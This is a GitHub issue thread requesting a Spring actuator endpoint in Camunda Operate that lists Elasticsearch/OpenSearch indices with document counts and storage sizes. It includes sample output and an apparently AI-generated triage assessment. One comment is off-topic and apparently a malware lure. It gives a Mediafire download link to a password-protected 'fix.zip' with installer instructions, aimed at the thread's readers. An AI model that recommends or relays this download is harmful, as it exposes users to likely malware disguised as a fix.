### ISSUE TITLE
Add actuator endpoint for getting information about indices

### ISSUE THREAD

**Issue by ralfpuchert** [camunda/camunda#21658]
### Description
In order to get detailed information during incidents or support cases about the state in the databases Operate can provide a list of indices sorted by name with document count, size on storage.
This should be done as [Spring actuator endpoint](https://docs.spring.io/spring-boot/reference/actuator/endpoints.html).

The information is retrievable via Elasticsearch/OpenSearch request
`/_cat/indices?v=&s`

### TODO

- [ ] Create actuator endpoint `/actuator/indices`
- [ ] Return information in machine readable form like this:

```
health status index                                                            uuid                   pri rep docs.count docs.deleted store.size pri.store.size dataset.size
green  open   operate-import-position-8.3.0_                                   GWN9ZnQzRbSEztVi3yg0iw   1   0         14            0      8.6kb          8.6kb        8.6kb
green  open   operate-migration-steps-repository-1.1.0_                        cqlJxrSHTy-WXL7KhLWkzw   1   0         27            1     29.1kb         29.1kb       29.1kb
green  open   operate-flownode-instance-8.3.1_                                 Vwrvh2VTQAy0Y15Zhfkzqw   1   0         23            2       40kb           40kb         40kb
```

### Additional Information

---------------------------------------------------------------------------------------------

### Acceptance Criteria

- [ ] Checked if the specific data needs to be provided for the QA process

### Definition of Ready - Checklist

- [ ] The issue has a meaningful title, description and testable acceptance criteria
- [ ] If documentation needs to be updated, an issue is created in the [camunda-docs](https://github.com/camunda/camunda-docs) repo, and the issue is added to our Operate project board.
- [ ] If HELM charts need to be updated, an issue is created in the [camunda-platform-heml](https://github.com/camunda/camunda-platform-helm) repo, and the issue is added to our Operate project board.
- [ ] Potential Security risks have been considered
- [ ] Cross-team dependencies have been considered

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcosgvieira** [comment]
### 🧭 Triage Assessment

| Field | Value |
|------|-------|
| **Work type** | TASK_TOIL_NON_FEATURE |
| **Impact** | ⚠️ Mid |
| **When** | ⚠️ Soon |
| **Confidence** | 0.9 |

---

### 📝 Rationale

Operational/support diagnostic enhancement adding a new Operate actuator endpoint with defined acceptance criteria; it is within Core Features ownership and should improve incident investigation workflow.   

---

🤖 _This issue was automatically triaged by an AI-based system as part of the Core Features triage workflow._

✋ **Want a human review?**
If you believe this assessment is incorrect or needs adjustment, feel free to update the details or request a manual triage by adding the **`triage:manual`** label.
